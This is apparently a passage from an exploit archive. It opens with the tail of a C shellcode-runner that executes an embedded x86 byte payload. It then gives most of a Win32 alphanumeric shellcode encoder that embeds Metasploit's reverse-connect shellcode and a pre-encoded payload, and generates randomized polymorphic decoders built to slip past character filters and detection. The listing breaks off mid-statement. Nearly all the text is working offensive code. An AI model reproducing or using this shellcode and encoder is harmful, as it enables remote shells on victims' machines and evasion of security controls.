x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
  4. /* ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Alphanumeric Shellcode Encoder Decoder Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>. +-----------+ WORKS CITED +-----------+ +--------------------------------------------------------------------------------------------------+ |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | |Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html> | | | |CLET Team. Aug. 2003 | |Polymorphic Shellcode Engine | |Phrack <http://www.phrack.org/show.php?p=61&a=9> | | | |Ionescu, Costin. 1 July 2003 | |Re: GetPC code (was: Shellcode from ASCII) | |Vuln-Dev <http://www.securityfocus.com/archive/82/327348> | | | |rix. Aug. 2001 | |Writing ia32 alphanumeric shellcodes | |Phrack <http://www.phrack.org/show.php?p=57&a=15> | | | |Wever, Berend-Jan. 28 Jan. 2001 | |Alphanumeric GetPC code | |Vuln-Dev <http://www.securityfocus.com/archive/82/351528> | |ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3> | +--------------------------------------------------------------------------------------------------+ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// */ #include <time.h> #include <stdio.h> #include <windows.h> #define MAX_BYTES 0x100 #define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack #define MIN_IP_STR_LEN 7 #define MAX_IP_STR_LEN 15 #define OFFSET_XOR_AL1_A 15 #define OFFSET_XOR_AL1_B 18 #define OFFSET_XOR_AL2_A 37 #define OFFSET_XOR_AL2_B 40 #define OFFSET_PUSH_DWORD1 0 #define OFFSET_PUSH_DWORD2 1 #define OFFSET_PUSH_DWORD3 4 #define OFFSET_PUSH_DWORD4 12 #define OFFSET_RANDOMIZED_DECODER_HEAD 14 #define SIZE_RANDOMIZED_DECODER_HEAD 16 BYTE EncodedShellcode[] = // encoded 336 bytes "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" "1telLPYuGyNvX1TyJ3yLdOwckr"; // example: make encoder choose more uppercase bytes... #define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset // feel free to //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// #define _Q(str) #str #define Q(str) _Q(str) #define P(str) #str ##" // <--- buffer offset\n"## _Q(str) /////////////////////////////////// #define CONNECT_BACK_SHELLCODE // //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. /////////////////////////////////////////////////////////////////// | int main(); // | UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | UCHAR get_push_register_instruction(UCHAR *reg); // | UCHAR get_random_alnum_value(); // | UCHAR get_random_alnum_push_dword_opcode(); // | UCHAR *get_nop_slide(UINT size, UINT slide); /////// | UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | UCHAR *shuffle(UCHAR str[], UINT length); /////// | DWORD my_htonl(DWORD dw_in); // | DWORD ip_str_to_dw(UCHAR *str); // | BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | BOOL is_alnum(UCHAR c); // | BOOL str_is_alnum(UCHAR *str); // | UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | struct xor2_key *choose_random_node(struct xor2_key *head); // | void free_p_xor2_key(struct xor2_key *node); // | // | struct xor2_key { // | UCHAR xor2; // | UCHAR key; // | struct xor2_key *prev; // | struct xor2_key *next; // | } xor2_key; // | // | // | // Title: Win32 Reverse Connect // | // Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | // Author: hdm[at]metasploit.com // | #ifdef CONNECT_BACK_SHELLCODE // | #define OFFSET_IP_ADDRESS 154 // | #define OFFSET_TCP_PORT_NUMBER 159 // | #define IP_ADDRESS "127.0.0.1" // | #define TCP_PORT_NUMBER 123 // | DWORD ip_address; // | UCHAR shellcode[] = // | "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | "IPIP" // I.P. address // | "\x68" // | "PORT" // TCP port number // | "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | #else ////////////////////////////////////// | UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' #endif // DWORD size = sizeof(shellcode)-1; // // int main() { ///////////////////////////////////////////////////////// //(decoder address is in ecx when decoder starts) // UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. // // | #define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | int offset_imul_key = '\xC1';//////////////////////// | int jne_xor1 = '\xC2';// >---------------------------------------------------------. | int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | // you would need to play with these two values if you want to reduce | | // the size of the NOP slides - they obviously need to stay alnum. | | // You could also play with the value of AL before the XOR is done | | // to get your desired negative offset. keep in mind that it will cost | | // you instructions to get al to the value you want (if you use xor of | | // two alphanumeric bytes, you would need to push first alphanumeric | | // char to the stack, pop eax, then xor it with it's alnum complement) | | // This playing around would result in an even harder to detect decoder | | // as the offsets would be different | | int size_decoder ='\xC4'; // | | int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | UCHAR imul_instruction_1 ='\x6B'; // | | UCHAR imul_instruction_2 ='\x41'; // | | UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | // // | | UINT column=0, i=0; /////////////////////////////// | | UCHAR *alnum = ALNUM_CHARSET; // | | UCHAR *p_alnum = alnum; // | | UCHAR decoder[] = // | | { //////////////////////////////////////////////////////////////////////////////// | | // | | //[step_1] -- multiply first encoded byte with key | | //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | // | | // Each binary byte is encoded into three alphanumeric bytes. | | // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | // binary byte. | | // | | // TODO: | | // .--(first byte ^ second byte) * third byte | | // '--(second byte ^ first byte) * third byte | | // | | // .--(first byte ^ third byte) * second byte | | // '--(third byte ^ first byte) * second byte | | // | | // .--(second byte ^ third byte) * first byte | | // '--(third byte ^ second byte) * first byte | | // | | // .--(first byte * second byte) ^ third byte | | // '--(second byte * first byte) ^ third byte | | // | | // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | // | | // .--(second byte * third byte) ^ first byte | | // '--(third byte * second byte) ^ first byte | | // | | // | | // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | // same encoder. | | // | | /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | /*13*/ '\x50', //push ??? (this can change) // [edi = address of decoder]------+ | | | /*14*/ '\x61', //popad // [set all registers] <-----------' | | | /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | /*26*/ '\x52', //push edx [save decoder address on stack] | | | /*27*/ '\x52', //push edx >----. | | | /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. | | | | | | | | /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | /*67*/ '\x49',// //dec ecx| |// | | | | | | /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | /*70*/ '\x41',// //inc edx| |// | | | | | | /*71*/ '\x49',// //dec edx| |// | | | | | | /*72*/ '\x41',// //inc esi| |// | | | | | | /*73*/ '\x49',// //dec esi+-----------------------+// | | | | | | /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | // | | | | | | // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | // or the offset will not be alphanumeric. | | | | | | // | | | | | | // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | // register instead. We happen to have such a register - edi =] | | | | | | // | | | | | | // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | // the pop eax would overwrite it | | | | | | // | | | | | | // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | // alphanumeric.). | | | | | | // | | | | | | // -OBSOLETE- | | | | | | // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (add the number of bytes to it) | | | | | | // If you wish to move it down, you will need to move it down by an even number of | | | | | | // bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (deduct the number of bytes from it) | | | | | | // | | | | | | // TODO: make a routine that moves it around randomally between allowed values | | | | | | // and sets the proper offsets | | | | | | // this routine should be called after the NOP slides have been randomized. | | | | | | // | | | | | | ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | /*83*/ '\x49',// //dec esi| |// | | | | | | /*84*/ '\x41',// //push eax| |// | | | | | | /*85*/ '\x49',// //pop eax| |// | | | | | | /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | // IMUL can go down to here | | | | | | ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. | | | | /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | /*104*/ '\x45', //ebp incremented once //inc ebp | | | | /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | };////////////////////////////////////////////////// | | UINT shrink; // | | UCHAR *found_msg; // | | UCHAR *p_decoder = decoder; // | | UCHAR xor1, xor2, key; // | | UCHAR temp_buf[3] = ""; // | | UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). | | UCHAR *p_shellcode = shellcode; // | | void *_eip = 0; // | | // | | int offset_nop_slide1; // | | int offset_nop_slide2; // | | int offset_half_size_decoder; // | | int offset_terminating_key; // | | int offset_imul_instruction1; // | | int offset_imul_instruction2; // | | int offset_imul_instruction3; // | | int offset_imul_instruction4; // | | int negative_offset_size_decoder1; // | | int negative_offset_size_decoder2; // | | int negative_offset_size_decoder3; // | | int offset_size_decoder_min_1; // | | int offset_size_decoder_pls_2; // | | int offset_imul_key_offset1; // | | int offset_imul_key_offset2; // | | int offset_imul_key_offset3; // | | int offset_imul_instruction; // | | int size_nop_slide1; // | | int size_nop_slide2; // | | int offset_jne_xor1; // | | int offset_jne_xor2; // | | int decoder_length_section1; // | | int decoder_length_section2; // | | int decoder_length_section3; // | | int imul_instruction_length; // | | int jne_xor_negative_offset; // | | int backward_slide_offset; // | | BOOL decoder_version_1; // | | UINT srand_value; // | | #ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | #endif ////////////////// | | printf("shellcode length:%d\n", size); // | | srand_value = time(NULL); // | | // srand_value = ; // for debugging | | srand(srand_value); // | | printf("srand value=%d\n", srand_value); // | | decoder_version_1 = rand() % 2; // | | ///// | | size_decoder = strlen(decoder);// | | decoder_length_section1 = 30; ////////////// | | decoder_length_section2 = 29; // | | decoder_length_section3 = 18; // | | // | | size_nop_slide1 = 28; // | | size_nop_slide2 = 0; // | | // | | imul_instruction_length = 4; // | | // | | shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | size_decoder -=shrink; /////////////////////////////////////////////////////// | | half_size_decoder = size_decoder/2; // | | size_nop_slide1 -=shrink; ///////////////////////// | | printf("shrinking decoder by: %d\n", shrink); // | | // | | offset_imul_instruction = decoder_length_section1+// | | decoder_length_section2+// | | size_nop_slide1;////////// | | // | | backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | strncpy(decoder, // | | slide_substr_back(decoder, // | | offset_imul_instruction, // | | imul_instruction_length, // | | size_decoder, ///// | | backward_slide_offset), // | | size_decoder); // | | offset_imul_instruction -=backward_slide_offset; // | | size_nop_slide1 -=backward_slide_offset; // | | size_nop_slide2 +=backward_slide_offset; ////////////// | | printf("backward_slide_offset = %d\n", backward_slide_offset);// | | /////////////////////////////////// | | negative_offset_size_decoder1 = 9; // | | negative_offset_size_decoder2 = 12; // | | negative_offset_size_decoder3 = 15; // | | // | | offset_half_size_decoder = 6; // | | offset_terminating_key = 8; // | | offset_jne_xor1 = 21; // | | offset_size_decoder_min_1 = 24; // | | // | | offset_imul_key_offset1 = 14 + decoder_length_section1; // | | offset_imul_key_offset2 = 17 + decoder_length_section1; // | | offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | offset_imul_key_offset3 = 24 + decoder_length_section1; // | | // | | offset_nop_slide1 = decoder_length_section1+ // | | decoder_length_section2; // | | offset_nop_slide2 = decoder_length_section1+ // | | decoder_length_section2+ // | | size_nop_slide1+ // | | imul_instruction_length; // | | // | | offset_imul_instruction1 = offset_imul_instruction; // | | offset_imul_instruction2 = offset_imul_instruction+1; // | | offset_imul_instruction3 = offset_imul_instruction+2; // | | offset_imul_instruction4 = offset_imul_instruction+3; // | | // | | // | | offset_imul_key = offset_imul_instruction4; // | | // | | offset_jne_xor2 = size_decoder-1; // | | jne_xor_negative_offset = decoder_length_section3+ // | | decoder_length_section2+ // | | size_nop_slide2+ // | | imul_instruction_length+ // | | size_nop_slide1; // | | // | | // | | printf("size_decoder=0x%2X - %s\n", // | | (UCHAR)size_decoder, ////// | | is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | // | | printf("half_size_decoder=0x%2X - %s\n", // | | (UCHAR)half_size_decoder, // | | is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_half_size_decoder) = half_size_decoder; // | | // | | printf("offset_imul_key=0x%2X - %s\n", // | | (UCHAR)offset_imul_key, // | | 